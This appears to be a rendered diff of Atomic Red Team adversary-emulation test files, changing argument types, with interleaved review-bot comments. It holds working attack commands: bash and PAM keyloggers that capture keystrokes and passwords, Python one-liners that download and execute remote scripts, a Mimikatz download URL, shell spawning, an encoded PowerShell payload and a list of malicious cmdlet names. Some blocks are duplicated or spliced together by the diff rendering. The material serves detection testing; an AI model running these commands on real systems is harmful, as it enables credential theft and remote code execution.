To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires to be run in a bash shell and that logger and tee are installed.
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
get_prereq_command: |
echo ""
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires to be run in a bash shell and that logger and tee are installed.
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
get_prereq_command: |
echo ""
executor:
name: sh
elevation_required: true
command: |
command: |
PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
tail /var/log/syslog
cleanup_command: |
cleanup_command: |
unset PROMPT_COMMAND
- name: Bash session based keylogger
auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
@@ -94,54 +93,54 @@ atomic_tests:
To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires to be run in a bash shell
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
get_prereq_command: |
echo ""
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires to be run in a bash shell
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
get_prereq_command: |
echo ""
input_arguments:
output_file:
name: output_file
description: File to store captured commands
type: String
type: string
default: /tmp/.keyboard.log
executor:
name: sh
elevation_required: false
command: |
elevation_required: false
command: |
trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
echo "Hello World!"
cat #{output_file}
cleanup_command: |
cleanup_command: |
rm #{output_file}
- name: SSHD PAM keylogger
auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
description: |
Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes.
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires sshd and auditd
prereq_command: |
if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
get_prereq_command: |
echo ""
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires sshd and auditd
prereq_command: |
if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
get_prereq_command: |
echo ""
input_arguments:
user_account:
description: Basic ssh user account for testing.
type: String
type: string
default: ubuntu
executor:
name: sh
elevation_required: true
command: |
elevation_required: true
command: |
cp -v /etc/pam.d/sshd /tmp/
echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd
systemctl restart sshd
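Review bot: under `input_arguments`, the `output_file` entry carries an extra `name: output_file` key (the hunk keeps it while changing `type`); the argument name is already the mapping key, and no other argument in this commit has a `name` field, so it is likely not permitted by the new JSON schema and should be dropped.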
@@ -152,30 +151,30 @@ atomic_tests:
whoami
exit
exit
cleanup_command: |
cleanup_command: |
cp -fv /tmp/sshd /etc/pam.d/
- name: Auditd keylogger
auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
description: |
The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log.
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires sshd and auditd
prereq_command: |
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
get_prereq_command: |
echo ""
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires sshd and auditd
prereq_command: |
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
get_prereq_command: |
echo ""
executor:
name: sh
elevation_required: true
command: |
elevation_required: true
command: |
auditctl -a always,exit -F arch=b64 -S execve -k CMDS
auditctl -a always,exit -F arch=b32 -S execve -k CMDS
whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S")
cleanup_command: |
cleanup_command: |
systemctl restart auditd
- name: MacOS Swift Keylogger
auto_generated_guid: aee3a097-4c5c-4fff-bbd3-0a705867ae29
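Review bot: the Auditd keylogger dependency description says "This test requires sshd and auditd", but the `prereq_command` only checks for `auditd` and the executor never touches sshd; the description is copied from the SSHD PAM test above and should read "This test requires auditd".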
@@ -184,20 +183,20 @@ atomic_tests:
Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring.
Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74
supported_platforms:
- macos
- macos
input_arguments:
swift_src:
description: Location of swift script
type: Path
default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift
description: Location of swift script
type: path
default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift
dependency_executor_name: bash
dependencies:
- description: |
swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions.
prereq_command: |
if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi
get_prereq_command: |
echo ""
- description: |
swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions.
prereq_command: |
if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi
get_prereq_command: |
echo ""
executor:
command: |
swift #{swift_src} -keylog
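Review bot: `Referece:` in the description context line above is a typo for `Reference:` and is worth fixing while this block is being re-indented. The prereq `if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi` also mutates the file it is checking, and the `chmod +x` is unnecessary because the executor runs the script through the interpreter (`swift #{swift_src} -keylog`); `[ -f #{swift_src} ] || exit 1` is enough. The input-monitoring permission the description calls out is not checked anywhere.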
+2 -2
@@ -10,11 +10,11 @@ atomic_tests:
input_arguments:
file_name:
description: Dll To Inject
type: Path
type: path
default: PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll
server_name:
description: TLS Server To Test Get Request
type: Url
type: url
default: https://www.example.com
dependency_executor_name: powershell
dependencies:
+1 -1
@@ -69,4 +69,4 @@ atomic_tests:
executor:
command: |
wmic process get /format:list
name: command_prompt
name: command_prompt
+23 -24
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
mimurl:
description: Mimikatz url
type: Url
type: url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
command: |
@@ -28,7 +28,7 @@ atomic_tests:
input_arguments:
file_path:
description: File path for SharpHound payload
type: String
type: string
default: PathToAtomicsFolder\T1059.001\src
dependency_executor_name: powershell
dependencies:
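Review bot: `file_path` is given `type: string`, but its description is "File path for SharpHound payload" and its default is `PathToAtomicsFolder\T1059.001\src`; since this commit introduces the lowercase `path` type for exactly such values, this argument should be `path` like the other path-valued arguments converted across the atomics.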
@@ -110,7 +110,7 @@ atomic_tests:
input_arguments:
url:
description: url of payload to execute
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1
executor:
command: |
@@ -127,7 +127,7 @@ atomic_tests:
input_arguments:
url:
description: url of payload to execute
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml
executor:
command: |
@@ -144,7 +144,7 @@ atomic_tests:
input_arguments:
url:
description: url of payload to execute
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct
executor:
command: |
@@ -206,7 +206,7 @@ atomic_tests:
input_arguments:
ads_file:
description: File created to store Alternate Stream Data
type: String
type: string
default: $env:TEMP\NTFS_ADS.txt
dependencies:
- description: |
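Review bot: `ads_file` ("File created to store Alternate Stream Data", default `$env:TEMP\NTFS_ADS.txt`) is a file path typed `string`; use `path` so the declared type matches the value, consistent with the other path arguments in this commit.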
@@ -229,19 +229,19 @@ atomic_tests:
description: |
Connect to a remote powershell session and interact with the host.
Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
supported_platforms:
- windows
- windows
input_arguments:
hostname_to_connect:
description: The host to connect to, by default it will connect to the local machine
type: String
type: string
default: $env:COMPUTERNAME
dependencies:
- description: |
PSRemoting must be enabled
PSRemoting must be enabled
prereq_command: |
Try {
New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null
@@ -271,11 +271,11 @@ atomic_tests:
input_arguments:
command_line_switch_type:
description: The type of supported command-line switch to use
type: String
type: string
default: Hyphen
command_param_variation:
description: The "Command" parameter variation to use
type: String
type: string
default: C
dependencies:
- description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
@@ -297,15 +297,15 @@ atomic_tests:
input_arguments:
command_line_switch_type:
description: The type of supported command-line switch to use
type: String
type: string
default: Hyphen
command_param_variation:
description: The "Command" parameter variation to use
type: String
type: string
default: C
encoded_arguments_param_variation:
description: The "EncodedArguments" parameter variation to use
type: String
type: string
default: EA
dependencies:
- description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
@@ -327,11 +327,11 @@ atomic_tests:
input_arguments:
command_line_switch_type:
description: The type of supported command-line switch to use
type: String
type: string
default: Hyphen
encoded_command_param_variation:
description: The "EncodedCommand" parameter variation to use
type: String
type: string
default: E
dependencies:
- description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
@@ -353,15 +353,15 @@ atomic_tests:
input_arguments:
encoded_command_param_variation:
description: The "EncodedCommand" parameter variation to use
type: String
type: string
default: E
command_line_switch_type:
description: The type of supported command-line switch to use
type: String
type: string
default: Hyphen
encoded_arguments_param_variation:
description: The "EncodedArguments" parameter variation to use
type: String
type: string
default: EncodedArguments
dependencies:
- description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
@@ -384,7 +384,7 @@ atomic_tests:
input_arguments:
obfuscated_code:
description: 'Defaults to: Invoke-Expression with a "Write-Host" line.'
type: String
type: string
default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==
executor:
command: |
@@ -398,8 +398,8 @@ atomic_tests:
- windows
input_arguments:
Malicious_cmdlets:
description: Known Malicious Cmdlets
type: String
description: Known Malicious Cmdlets
type: string
default: |
"Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"
executor:
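Review bot: `Malicious_cmdlets` is the only input argument in this file that is not snake_case (`file_path`, `ads_file`, `hostname_to_connect` and the rest are); since the schema migration rewrites this block anyway, renaming it `malicious_cmdlets` keeps argument names uniform. Note also that `default:` is a `|` block scalar, so the substituted value ends with a newline; fine if the executor treats it as a list, but worth confirming against the command that consumes it.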
@@ -440,4 +440,3 @@ atomic_tests:
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
name: powershell
+10 -10
@@ -10,11 +10,11 @@ atomic_tests:
input_arguments:
command_to_execute:
description: Command to execute within script.
type: String
type: string
default: dir
script_path:
description: Script path.
type: Path
type: path
default: $env:TEMP\T1059.003_script.bat
dependency_executor_name: powershell
dependencies:
@@ -40,11 +40,11 @@ atomic_tests:
input_arguments:
file_contents_path:
description: Path to the file that the command prompt will drop.
type: Path
type: path
default: '%TEMP%\test.bin'
message:
description: Message that will be written to disk and then displayed.
type: String
type: string
default: 'Hello from the Windows Command Prompt!'
executor:
command: |
@@ -61,11 +61,11 @@ atomic_tests:
input_arguments:
output_file:
description: File to output to
type: String
type: string
default: hello.txt
input_message:
description: Message to write to file
type: String
type: string
default: Hello, from CMD!
executor:
command: |
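Review bot: `output_file` ("File to output to", default `hello.txt`) is a filesystem path typed `string`; use `path`, as `script_path` and `file_contents_path` do in the hunks above in this same file.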
@@ -82,11 +82,11 @@ atomic_tests:
input_arguments:
file_to_print:
description: File to be opened/printed by Wordpad.
type: String
type: string
default: $env:temp\T1059_003note.txt
max_to_print:
description: The maximum number of Wordpad windows the test will open/print.
type: String
type: string
default: 75
dependency_executor_name: powershell
dependencies:
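Review bot: `file_to_print` ("File to be opened/printed by Wordpad", default `$env:temp\T1059_003note.txt`) is a path and should be `path` rather than `string`. `max_to_print` is a count (default `75`) but is also typed `string`; if the new schema defines a numeric argument type, it belongs there so the value is validated as a number.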
@@ -113,7 +113,7 @@ atomic_tests:
input_arguments:
input_file:
description: CMD file that is read by Command Prompt and execute, which launches calc.exe
type: Path
type: path
default: PathToAtomicsFolder\T1059.003\src\t1059.003_cmd.cmd
dependency_executor_name: powershell
dependencies:
@@ -128,4 +128,4 @@ atomic_tests:
command: |
cmd /r cmd<#{input_file}
name: command_prompt
elevation_required: false
elevation_required: false
+7 -7
@@ -11,7 +11,7 @@ atomic_tests:
input_arguments:
script_path:
description: Script path
type: Path
type: path
default: /tmp/art.sh
executor:
command: |
@@ -43,15 +43,15 @@ atomic_tests:
description: |
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
supported_platforms:
- linux
- linux
input_arguments:
autosuid:
description: Path to the autosuid shell script
type: Path
type: path
default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
autosuid_url:
description: Path to download autosuid shell script
type: Url
type: url
default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
dependency_executor_name: bash
dependencies:
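Review bot: `autosuid_url` defaults to `https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh`, i.e. whatever is on the upstream `main` branch at run time, whereas `linenum_url` in the next test is pinned to a commit hash. Because the dependency step downloads this script and the executor runs it, pin it to a specific commit (or make the checked-in copy under `src/` the only source) so a change in the third-party repository cannot silently change what the test executes. The description "Path to download autosuid shell script" also describes a URL, not a path, now that the type is `url`.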
@@ -73,15 +73,15 @@ atomic_tests:
description: |
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
supported_platforms:
- linux
- linux
input_arguments:
linenum:
description: Path to the LinEnum shell script
type: Path
type: path
default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
linenum_url:
description: Path to download LinEnum shell script
type: Url
type: url
default: https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh
dependency_executor_name: bash
dependencies:
+3 -3
@@ -5,14 +5,14 @@ atomic_tests:
auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9
description: |-
Visual Basic execution test, execute vbscript via PowerShell.
When successful, system information will be written to $env:TEMP\T1059.005.out.txt.
supported_platforms:
- windows
input_arguments:
vbscript:
description: Path to sample script
type: String
type: string
default: PathToAtomicsFolder\T1059.005\src\sys_info.vbs
dependency_executor_name: powershell
dependencies:
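Review bot: `vbscript` keeps `type: string` while its description is "Path to sample script" and its default is `PathToAtomicsFolder\T1059.005\src\sys_info.vbs`; it should be `path`, matching the conversion applied to the other path arguments in this commit.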
@@ -70,7 +70,7 @@ atomic_tests:
input_arguments:
ms_product:
description: Maldoc application Word
type: String
type: string
default: Word
dependency_executor_name: powershell
dependencies:
+169 -169
@@ -1,172 +1,172 @@
attack_technique: T1059.006
display_name: 'Command and Scripting Interpreter: Python'
atomic_tests:
- name: Execute shell script via python's command mode arguement
auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
description: Download and execute shell script and write to file then execute locally using Python -c (command mode)
supported_platforms:
- linux
input_arguments:
script_url:
description: Shell script public URL
type: String
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Name of shell script downloaded from the script_url
type: String
default: T1059.006-payload
executor:
description: Linux shell
type: String
default: sh
script_args:
description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files.
type: String
default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
dependency_executor_name: sh
dependencies:
- description: Verify if python is in the environment variable path and attempt to import requests library.
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |
which_python=$(which python || which python3 || which python2)
$which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
name: sh
cleanup_command: |
rm #{payload_file_name}
- name: 'Execute Python via scripts (Linux)'
auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
description: Create Python file (.py) that downloads and executes shell script via executor arguments
supported_platforms:
- linux
input_arguments:
python_script_name:
description: Python script name
type: Path
default: T1059.006.py
script_url:
description: Shell script public URL
type: String
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Shell script file name downloaded from the script_url
type: String
default: T1059.006-payload
executor:
description: Payload or script interpreter / executor
type: String
default: sh
script_args:
description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
type: String
default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
dependency_executor_name: sh
dependencies:
- description: |
Requires Python
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |
which_python=$(which python || which python3 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python #{python_script_name}
name: sh
cleanup_command: |
rm #{python_script_name} #{payload_file_name}
- name: 'Execute Python via Python executables (Linux)'
auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
description: |
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
supported_platforms:
- linux
input_arguments:
python_script_name:
description: Name of Python script name
type: Path
default: T1059.006.py
script_url:
description: URL hosting external malicious payload
type: String
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Shell script file name downloaded from the script_url
type: String
default: T1059.006-payload
executor:
description: Payload or script interpreter / executor
type: String
default: sh
script_args:
description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
type: String
default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
python_binary_name:
description: Name of Python file to be compiled
type: Path
default: T1059.006.pyc
dependency_executor_name: sh
dependencies:
- description: |
Requires Python
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |
which_python=$(which python || which python3 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
$which_python #{python_binary_name}
name: sh
cleanup_command: |
rm #{python_binary_name} #{python_script_name} #{payload_file_name}
- name: 'Python pty module and spawn function used to spawn sh or bash'
auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792
description: |
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
supported_platforms:
- linux
dependencies:
- description: |
Verify if python is in the environment variable path and attempt to import requests library.
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
atomic_tests:
- name: Execute shell script via python's command mode arguement
auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
description: Download and execute shell script and write to file then execute locally using Python -c (command mode)
supported_platforms:
- linux
input_arguments:
script_url:
description: Shell script public URL
type: string
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Name of shell script downloaded from the script_url
type: string
default: T1059.006-payload
executor:
command: |-
which_python=$(which python || which python3 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit
name: bash
description: Linux shell
type: string
default: sh
script_args:
description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files.
type: string
default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
dependency_executor_name: sh
dependencies:
- description: Verify if python is in the environment variable path and attempt to import requests library.
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |
which_python=$(which python || which python3 || which python2)
$which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
name: sh
cleanup_command: |
rm #{payload_file_name}
- name: 'Execute Python via scripts (Linux)'
auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
description: Create Python file (.py) that downloads and executes shell script via executor arguments
supported_platforms:
- linux
input_arguments:
python_script_name:
description: Python script name
type: path
default: T1059.006.py
script_url:
description: Shell script public URL
type: string
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Shell script file name downloaded from the script_url
type: string
default: T1059.006-payload
executor:
description: Payload or script interpreter / executor
type: string
default: sh
script_args:
description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
type: string
default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
dependency_executor_name: sh
dependencies:
- description: |
Requires Python
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |
which_python=$(which python || which python3 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python #{python_script_name}
name: sh
cleanup_command: |
rm #{python_script_name} #{payload_file_name}
- name: 'Execute Python via Python executables (Linux)'
auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
description: |
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
supported_platforms:
- linux
input_arguments:
python_script_name:
description: Name of Python script name
type: path
default: T1059.006.py
script_url:
description: URL hosting external malicious payload
type: string
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Shell script file name downloaded from the script_url
type: string
default: T1059.006-payload
executor:
description: Payload or script interpreter / executor
type: string
default: sh
script_args:
description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
type: string
default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
python_binary_name:
description: Name of Python file to be compiled
type: path
default: T1059.006.pyc
dependency_executor_name: sh
dependencies:
- description: |
Requires Python
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |
which_python=$(which python || which python3 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
$which_python #{python_binary_name}
name: sh
cleanup_command: |
rm #{python_binary_name} #{python_script_name} #{payload_file_name}
- name: 'Python pty module and spawn function used to spawn sh or bash'
auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792
description: |
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
supported_platforms:
- linux
dependencies:
- description: |
Verify if python is in the environment variable path and attempt to import requests library.
prereq_command: |
which_python=$(which python || which python3 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: |
pip install requests
executor:
command: |-
which_python=$(which python || which python3 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit
name: bash
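Review bot: every prereq in this file ends with `$which_python -c 'import requests' 2>/dev/null; echo $?`, so the exit status of the check is that of `echo` (always 0) and the dependency passes even when `requests` is missing; drop the `echo $?` so that a failed import actually triggers `get_prereq_command`. Related: `get_prereq_command: pip install requests` uses a bare `pip` that need not belong to the interpreter resolved into `which_python`; `$which_python -m pip install requests` installs into the interpreter that will run the test. The pty test declares the same `requests` dependency although its command only imports `pty`, so that dependency block can go. The input argument named `executor` (description "Linux shell" / "Payload or script interpreter / executor") shares its name with the top-level `executor:` key, which is confusing to read, especially in this rendered diff where the pty test's executor block appears spliced into the first test's arguments; a name such as `script_interpreter` avoids the ambiguity. `script_url` is a URL but stays `type: string` while this commit introduces `url`, and "arguement" in the first test name is a typo.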
+41 -41
@@ -1,44 +1,44 @@
attack_technique: T1059.007
display_name: "Command and Scripting Interpreter: JavaScript"
atomic_tests:
- name: JScript execution to gather local computer information via cscript
auto_generated_guid: 01d75adf-ca1b-4dd1-ac96-7c9550ad1035
description: JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt
supported_platforms:
- windows
input_arguments:
jscript:
description: Path to sample script
type: string
default: PathToAtomicsFolder\T1059.007\src\sys_info.js
dependency_executor_name: powershell
dependencies:
- description: Sample script must exist on disk at specified location (#{jscript})
prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} "
get_prereq_command: |-
